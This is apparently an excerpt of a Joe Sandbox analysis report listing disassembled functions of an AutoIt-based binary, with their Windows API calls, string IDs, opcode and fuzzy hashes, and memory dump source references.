                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: 49ed4765070c14ff2e51143c7c127ba2ea722871f97524ac3359a1156144049c
                                  • Instruction ID: 42a3731d8ffc07c8e73cd9aaa4378b817ca3e248c7ecc13af21cbbf3b053665a
                                  • Opcode Fuzzy Hash: 49ed4765070c14ff2e51143c7c127ba2ea722871f97524ac3359a1156144049c
                                  • Instruction Fuzzy Hash: 7B21DA767419197BF21755254D82FFA335CAF6038DF644020FE089EEC1FB64EE1181A5
                                  Function 003D4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 0-572801152
                                  • Opcode ID: 65df901c26aa58ba08ef166a68aff83bfab2bf69993f991893d9aa99048b5a70
                                  • Instruction ID: 46220238c2ae64cfa1409495fda9f656e19c6a05379ebddf5fb7e3e5d2ea95ec
                                  • Opcode Fuzzy Hash: 65df901c26aa58ba08ef166a68aff83bfab2bf69993f991893d9aa99048b5a70
                                  • Instruction Fuzzy Hash: DED1D176A0060A9FDF12CFA8D881BAEB7B5BF48304F15846AE915AB380D370DD45CB90
                                  Function 00391522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?), ref: 003915CE
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00391651
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003916E4
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003916FB
                                    • Part of subcall function 00383820: RtlAllocateHeap.NTDLL(00000000,?,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6,?,00351129), ref: 00383852
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00391777
                                  • __freea.LIBCMT ref: 003917A2
                                  • __freea.LIBCMT ref: 003917AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                  • String ID:
                                  • API String ID: 2829977744-0
                                  • Opcode ID: ff092c8c6246e4e5f1a2d2a7562c2ea37707070942654a05037043e6d9a0d477
                                  • Instruction ID: ded8a29c53856ed809e27420bf5c15ec53a33076b3502baaf63761c79bde38fb
                                  • Opcode Fuzzy Hash: ff092c8c6246e4e5f1a2d2a7562c2ea37707070942654a05037043e6d9a0d477
                                  • Instruction Fuzzy Hash: 6A91B572E102179EDF229EB4CC81AEE7BB9AF4A710F1A4659E901FB181D735DC44CB60
                                  Function 003D4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 2610073882-625585964
                                  • Opcode ID: a0bdf751473de0f51fcf2831c9e17537e67b48fc9e446176309d14b705e08980
                                  • Instruction ID: cb6e220ac6a0dbac31aeb038521b2e1e5d27a8b22e9ba6b4dabefd1b3547f16e
                                  • Opcode Fuzzy Hash: a0bdf751473de0f51fcf2831c9e17537e67b48fc9e446176309d14b705e08980
                                  • Instruction Fuzzy Hash: 00919572A00215AFDF22CFA5E884FAEBBB8EF46714F10855AF515AB280D7709945CF90
                                  Function 003C1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003C125C
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003C1284
                                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003C12A8
                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003C12D8
                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003C135F
                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003C13C4
                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003C1430
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                  • String ID:
                                  • API String ID: 2550207440-0
                                  • Opcode ID: d90c5eb5bdb1fe44a961b87098e7ceafb5d565e156b76408ebd3a329831ce688
                                  • Instruction ID: 233f81c164a3083d86692c9fa56a00174c6abf5302a7717950363bdf535fd599
                                  • Opcode Fuzzy Hash: d90c5eb5bdb1fe44a961b87098e7ceafb5d565e156b76408ebd3a329831ce688
                                  • Instruction Fuzzy Hash: 3B91EF75A002089FDB06DFA5C884FBEB7B9FF46315F118429E910EB292D774AD41DB90
                                  Function 0036948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$BeginCreatePath
                                  • String ID:
                                  • API String ID: 3225163088-0
                                  • Opcode ID: 485fa8737f963f9dc488ff89ebaa720b4d1a98954fdd142dc242d09972c04359
                                  • Instruction ID: 6c9eaab21fe7c9ab750afa1eb23521eb0646b35c3f83eac71b338b294dd002ac
                                  • Opcode Fuzzy Hash: 485fa8737f963f9dc488ff89ebaa720b4d1a98954fdd142dc242d09972c04359
                                  • Instruction Fuzzy Hash: EB916C71D00209EFCB12CFA9CC84AEEBBB8FF49320F158546E515B7295D774A942CBA0
                                  Function 003D3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 003D396B
                                  • CharUpperBuffW.USER32(?,?), ref: 003D3A7A
                                  • _wcslen.LIBCMT ref: 003D3A8A
                                  • VariantClear.OLEAUT32(?), ref: 003D3C1F
                                    • Part of subcall function 003C0CDF: VariantInit.OLEAUT32(00000000), ref: 003C0D1F
                                    • Part of subcall function 003C0CDF: VariantCopy.OLEAUT32(?,?), ref: 003C0D28
                                    • Part of subcall function 003C0CDF: VariantClear.OLEAUT32(?), ref: 003C0D34
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                  • API String ID: 4137639002-1221869570
                                  • Opcode ID: 6a4f980943897bc929af206e8ffd2e684aeda9131683843a8bbc69b0608ad4a6
                                  • Instruction ID: b1013c335f102a63d58bb087e912d96e504b8490b8ebc71dc158a85363a4a562
                                  • Opcode Fuzzy Hash: 6a4f980943897bc929af206e8ffd2e684aeda9131683843a8bbc69b0608ad4a6
                                  • Instruction Fuzzy Hash: 3B917975A083419FC705DF28D48196AB7E4FF89314F14896EF88A9B351DB30EE49CB92
                                  Function 003D4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?,?,003B035E), ref: 003B002B
                                    • Part of subcall function 003B000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?), ref: 003B0046
                                    • Part of subcall function 003B000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?,?), ref: 003B0054
                                    • Part of subcall function 003B000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003AFF41,80070057,?), ref: 003B0064
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003D4C51
                                  • _wcslen.LIBCMT ref: 003D4D59
                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 003D4DCF
                                  • CoTaskMemFree.OLE32(?), ref: 003D4DDA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                  • String ID: NULL Pointer assignment
                                  • API String ID: 614568839-2785691316
                                  • Opcode ID: 9cb25d3664685dec54dc19597a83c0fc8737f545fae011a81d518afcede61947
                                  • Instruction ID: 0ada8876f160de0b9a01061d27ca766760b0179f2b6b8f018e055e946bf54fda
                                  • Opcode Fuzzy Hash: 9cb25d3664685dec54dc19597a83c0fc8737f545fae011a81d518afcede61947
                                  • Instruction Fuzzy Hash: 1B910772D0021DAFDF16DFA4D891EEEB7B9BF08304F10856AE915AB251DB309A45CF60
                                  Function 003E20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenu.USER32(?), ref: 003E2183
                                  • GetMenuItemCount.USER32(00000000), ref: 003E21B5
                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E21DD
                                  • _wcslen.LIBCMT ref: 003E2213
                                  • GetMenuItemID.USER32(?,?), ref: 003E224D
                                  • GetSubMenu.USER32(?,?), ref: 003E225B
                                    • Part of subcall function 003B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003B3A57
                                    • Part of subcall function 003B3A3D: GetCurrentThreadId.KERNEL32 ref: 003B3A5E
                                    • Part of subcall function 003B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003B25B3), ref: 003B3A65
                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003E22E3
                                    • Part of subcall function 003BE97B: Sleep.KERNEL32 ref: 003BE9F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                  • String ID:
                                  • API String ID: 4196846111-0
                                  • Opcode ID: 67ecdbb240cf9a6a4f6bf90fce6d355d182c164978b0b8737031cf01da870064
                                  • Instruction ID: 58faca6afdb71555c675d8adaab5709706800e564adfd5c7ab62f94d18ddf34b
                                  • Opcode Fuzzy Hash: 67ecdbb240cf9a6a4f6bf90fce6d355d182c164978b0b8737031cf01da870064
                                  • Instruction Fuzzy Hash: 6471B035A00255AFCB12DF65C881AAEB7F9FF48310F158558E916EB391D734EE01CB90
                                  Function 003BAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(?), ref: 003BAEF9
                                  • GetKeyboardState.USER32(?), ref: 003BAF0E
                                  • SetKeyboardState.USER32(?), ref: 003BAF6F
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 003BAF9D
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 003BAFBC
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 003BAFFD
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003BB020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 7514f5a1f7c1aa01b270e396b09b957414369712ec07084cf73eeb2540c079fe
                                  • Instruction ID: 3881897a121866e9fdbed398c92bb2d7b2a826763a7e3e5488cfcefca3edc02c
                                  • Opcode Fuzzy Hash: 7514f5a1f7c1aa01b270e396b09b957414369712ec07084cf73eeb2540c079fe
                                  • Instruction Fuzzy Hash: D751C0A0A04AD53DFB3752348C45BFABEA95B06308F098589E2D949CC2C7D9E888D751
                                  Function 003BACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(00000000), ref: 003BAD19
                                  • GetKeyboardState.USER32(?), ref: 003BAD2E
                                  • SetKeyboardState.USER32(?), ref: 003BAD8F
                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003BADBB
                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003BADD8
                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003BAE17
                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003BAE38
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 35793139c019d49ea618365e3ad154dac20e41fe823ebf98c3fcdc42f6e04fb1
                                  • Instruction ID: 7b0a9bd174b42734e881e66fe4de9457ccdce5612f70a1ca53d726080442b8cc
                                  • Opcode Fuzzy Hash: 35793139c019d49ea618365e3ad154dac20e41fe823ebf98c3fcdc42f6e04fb1
                                  • Instruction Fuzzy Hash: 6551E6A1904FD53DFB3383348C95BFABE995B46308F08858CE2D54ACC2C694EC84E762
                                  Function 0038542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(00393CD6,?,?,?,?,?,?,?,?,00385BA3,?,?,00393CD6,?,?), ref: 00385470
                                  • __fassign.LIBCMT ref: 003854EB
                                  • __fassign.LIBCMT ref: 00385506
                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00393CD6,00000005,00000000,00000000), ref: 0038552C
                                  • WriteFile.KERNEL32(?,00393CD6,00000000,00385BA3,00000000,?,?,?,?,?,?,?,?,?,00385BA3,?), ref: 0038554B
                                  • WriteFile.KERNEL32(?,?,00000001,00385BA3,00000000,?,?,?,?,?,?,?,?,?,00385BA3,?), ref: 00385584
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: b87052b105814b930b6d7a24d7aa86481f406fef22e85b9c9219ebc3083ff3dc
                                  • Instruction ID: de167a04d7631d138fddd012b81f6b56406b864b0e127cfd964363a509961551
                                  • Opcode Fuzzy Hash: b87052b105814b930b6d7a24d7aa86481f406fef22e85b9c9219ebc3083ff3dc
                                  • Instruction Fuzzy Hash: 0C51E670A007489FDB22DFA8D881AEEBBF9EF09300F14415AF956E7291D7309A41CB60
                                  Function 003D10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003D307A
                                    • Part of subcall function 003D304E: _wcslen.LIBCMT ref: 003D309B
                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003D1112
                                  • WSAGetLastError.WSOCK32 ref: 003D1121
                                  • WSAGetLastError.WSOCK32 ref: 003D11C9
                                  • closesocket.WSOCK32(00000000), ref: 003D11F9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                  • String ID:
                                  • API String ID: 2675159561-0
                                  • Opcode ID: a92ed908d03459536d0100e9759b529bde9508c27ac3e9864ff9c57366706c42
                                  • Instruction ID: b1ef92f68b2ff09fec7e33dffe78565c8e9013435bc84f30d99e7e05fa891b3c
                                  • Opcode Fuzzy Hash: a92ed908d03459536d0100e9759b529bde9508c27ac3e9864ff9c57366706c42
                                  • Instruction Fuzzy Hash: 2F41C332600204AFDB229F64D885BAAB7E9EF45324F14815AFD159F391C770AD45CBA1
                                  Function 003BCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003BCF22,?), ref: 003BDDFD
                                    • Part of subcall function 003BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003BCF22,?), ref: 003BDE16
                                  • lstrcmpiW.KERNEL32(?,?), ref: 003BCF45
                                  • MoveFileW.KERNEL32(?,?), ref: 003BCF7F
                                  • _wcslen.LIBCMT ref: 003BD005
                                  • _wcslen.LIBCMT ref: 003BD01B
                                  • SHFileOperationW.SHELL32(?), ref: 003BD061
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
